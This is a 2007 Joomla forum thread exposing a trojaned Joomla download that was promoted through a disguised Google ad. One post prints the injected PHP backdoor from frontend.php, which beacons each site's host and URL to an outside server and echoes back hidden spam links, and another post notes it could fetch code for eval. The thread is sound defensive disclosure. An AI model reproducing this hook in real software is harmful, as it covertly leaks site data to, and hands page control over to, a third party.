Phishing site CONFIRMED

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
AlecWeb
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Jun 28, 2007 3:25 pm

Phishing site CONFIRMED

Postby AlecWeb » Thu Jun 28, 2007 6:27 pm

Hi guys,

I found this site today: http://www.templatesbrowser.com/downloa ... UAodhhZbYQ
It was a commercial link in Google when I typed 'joomla' as keyword.

I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor.

Just my 2 cents :)

Regards,
Alec
Last edited by rliskey on Thu Jun 28, 2007 8:06 pm, edited 1 time in total.

User avatar
pe7er
Joomla! Master
Joomla! Master
Posts: 21422
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, The Netherlands
Contact:

Phishing site CONFIRMED

Postby pe7er » Thu Jun 28, 2007 7:42 pm

AlecWeb wrote:I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor.

Yes, it's Joomla 1.0.12 indeed, but one file has been altered: /includes/frontend.php

The following (spyware?) code has been added to the file.
It's included in the function mosMainBody():
$url = "http://get.templatesbrowser.com/j.php?" .
        "host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
  @readfile($url);
  fclose($check);
}


When the mosMainBody is run, the routine creates some URL variable with your server's hostname + your website's URL,
it tests if it is able to connect to the templatesbrowser's site.
If it is able to create a connection, then some URL (with your hostname + your website's URL) will be retrieved,
and templatebrowser can store statistics about your site.
Last edited by rliskey on Thu Jun 28, 2007 8:06 pm, edited 1 time in total.
Kind Regards,
Peter Martin, Global Moderator
http://www.db8.nl - Joomla specialist, Nijmegen, Nederland
Developer of db8 Site Dev http://extensions.joomla.org/extensions ... 8-site-dev

User avatar
pe7er
Joomla! Master
Joomla! Master
Posts: 21422
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, The Netherlands
Contact:

Re: Phishing site?

Postby pe7er » Thu Jun 28, 2007 7:51 pm

I was looking for some more info regarding that website,
and I found an interesting article: http://www.onnoot.com/e/532/Templatesbr ... _WordPress

The article describes the same routine as I found in their Joomla's /includes/frontend.php
It includes hidden commercial links ("link spam") in your site, without your knowing!

btw: an interesting quote from the onnoot.com website:
Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.
Kind Regards,
Peter Martin, Global Moderator
http://www.db8.nl - Joomla specialist, Nijmegen, Nederland
Developer of db8 Site Dev http://extensions.joomla.org/extensions ... 8-site-dev

User avatar
rliskey
Joomla! Guru
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway
Contact:

Re: Phishing site?

Postby rliskey » Thu Jun 28, 2007 8:03 pm

A great example of why is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity
Last edited by rliskey on Thu Jun 28, 2007 8:05 pm, edited 1 time in total.

aruba
I've been banned!
Posts: 38
Joined: Fri Jun 15, 2007 8:52 pm

Re: Phishing site?

Postby aruba » Thu Jun 28, 2007 8:55 pm

rliskey wrote:A great example of why is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity


I've been beating the drum on this since last year :(

It can only get worse IMHO.

As Joomla gets more secure, you will see more and more ingenious ways to subvert that security.

No where is that more true than the templates and extensions directory.

I have always maintained that ALL  GPL code submitted to the JED MUST be archived ON Jforge.
If there is to be a code update, it is communicated to JForge and the version number is incremented.

Even if Joomla does not supply the download and defers to the developer (who may want a link to their site and registration before you can download - a behavior I deplore), an archived copy can protect users from having spy code introduced to their machine.
After download, they can compare a generated checksum of the code from site 'X' with the Joomla archived version.


There is an incredible risk of hijack and coercive code being introduced to the community.

Note that the above code connects to the home site and loads HTML DATA,  IT COULD EASILY HAVE LOADED CODE INSTEAD TO BE RUN IN THE CONTEXT OF YOUR SITE! ( by returning a string and executing an EVAL against it)


This is very serious news... I hope we can take time off the "GREAT GPL DEBATE DEBACLE" to handle it properly :(

AlecWeb
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Jun 28, 2007 3:25 pm

Re: Phishing site CONFIRMED

Postby AlecWeb » Thu Jun 28, 2007 11:24 pm

Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before to many users follow this link?

Anyway, thanks for the great piece of software!
(btw: I always use the real joomla.org to download Joomla! :)

Regards,
Alec

The screenshots:
http://alecweb.ulyssis.org/sponsered-link-2.png
http://alecweb.ulyssis.org/sponsered-link-joomla.png

User avatar
pe7er
Joomla! Master
Joomla! Master
Posts: 21422
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, The Netherlands
Contact:

Re: Phishing site CONFIRMED

Postby pe7er » Fri Jun 29, 2007 2:34 pm

AlecWeb wrote:Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before to many users follow this link?


The latest news:
  • The sponsored link @ Google is no longer there...
  • And the download link is 404.

Thanks to all who helped solving this issue
(& special thanks to Wordpress user Onnoot for his efforts)
:)
Kind Regards,
Peter Martin, Global Moderator
http://www.db8.nl - Joomla specialist, Nijmegen, Nederland
Developer of db8 Site Dev http://extensions.joomla.org/extensions ... 8-site-dev


Return to “Security - 1.0.x”

Who is online

Users browsing this forum: No registered users and 3 guests